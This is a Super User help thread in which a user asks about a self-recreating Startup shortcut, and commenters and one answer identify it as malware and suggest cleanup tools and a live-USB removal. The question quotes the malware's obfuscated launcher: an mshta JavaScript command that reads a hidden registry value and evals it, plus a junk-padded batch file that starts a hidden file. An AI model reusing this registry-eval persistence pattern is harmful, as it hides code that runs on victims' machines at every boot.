2

There is a shortcut in the Startup folder with this as the command line it runs. I've deleted the shortcut and it just reappears within seconds. Rename it and a new one reappears within seconds.

C:\Windows\System32\cmd.exe /C start "" mshta.exe "javascript:P4jMDuRB="Sm3jr6aQ";c40B=new ActiveXObject("WScript.Shell");QS2K8wl="cDy";nv5R4S=c40B.RegRead("HKCU\\software\\voxpbs\\semhdvkm");g2McQ8A="Ns6iJl";eval(nv5R4S);JldeI3="1UbkKa";"

I also found a batch file in my users\me\local folder. The commands it runs is:

echo J9pmT5Q
echo B0NWNWENzjH21WwgEa2kO0
echo 5Wjb2iki6K0a
echo FrG1NkCWmPPz57pvX
echo vxh8uiEY4zed9rLWqlq3INKnP
echo ZJ882016HVGsX28HEC53bkelC
echo x4SZRj8VY37HCvczeQ9
start "QevslvDchtWcI59vUY1" "%LOCALAPPDATA%\9d9b\505f.3f751"
echo rDqX4A1lWPV1YBTn47sCq
echo US6k8ZpwRaBaZ8WjjuIWQoHhqnYhPf3U
echo VHu5IVd8Y0oGQx0qB0UJaQhjf
echo Q98kbBFD2PgR
echo uEyyzwkL88oeKhG1d3U3ds
echo lpM0oIMjeZ2IA5w9GGWaXzhx3PGmfoO
echo YJrUdLTH

I see this being run when the computer boots. It's called by a shortcut names "d178". I see the command window for a short time during the boot process. I've scanned the file "505f.3f751", it comes up no infections so far.

If anyone has any ideas on what these are that would be cool. I haven't tried a boot into safe mode yet to see what happens then. I probably will soon.

kenorb
  • 24,736
  • 27
  • 129
  • 199
montejw360
  • 31
  • 2
  • 1
    It starts a program called `mshta.exe`. You are infected with adware/malware you should remove it. Delete, `HKCU\software\voxpbs\semhdvkm`, that key in the registry. – Ramhound Dec 17 '16 at 02:55
  • A nice tool you can use to remove automatically any registry entries and potential harmful files created by the malware is AdwCleaner ([download here](https://toolslib.net/downloads/viewdownload/1-adwcleaner/) ) Download it, run it and after the scan, it will alert you about the results: choose the files to delete and finally delete them. – Jesús Hagiwara Dec 17 '16 at 03:30
  • 2
    Possible duplicate of [How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?](http://superuser.com/questions/100360/how-can-i-remove-malicious-spyware-malware-adware-viruses-trojans-or-rootkit) – DavidPostill Dec 17 '16 at 17:12
  • I removed the registry key HKCU\software\voxpbs. It was replicated after the computer was rebooted. It has several REG_SZ values under it, semhdvkm is just one of them. I can only see garbage when viewing the values in the main regedit window, but when opening any of them the value string is blank. Although it has spaces, i.e. you can backspace from the end to the beginning, but never see any text. – montejw360 Dec 18 '16 at 00:41

1 Answers1

0

This is most likely some kind of malware, adware, or other PUP.

Therefore, we should try to remove it. I see that you've tried to remove it with regedit. I suggest that you try AdwCleaner as was suggested and also Malwarebytes.

If you still can't seem to remove it, then this program is probably running itself and copying back when it detects it's deleted. Therefore, I suggest that we try removing it while external to the OS. Download any live Linux distro, such as this one, and a tool called Rufus. Use Rufus to put the ISO onto a flash drive. Boot the flash drive and try removing the file. Hopefully, when you restart, it'll be gone.

Aaron Franke
  • 1,163
  • 6
  • 23
  • 36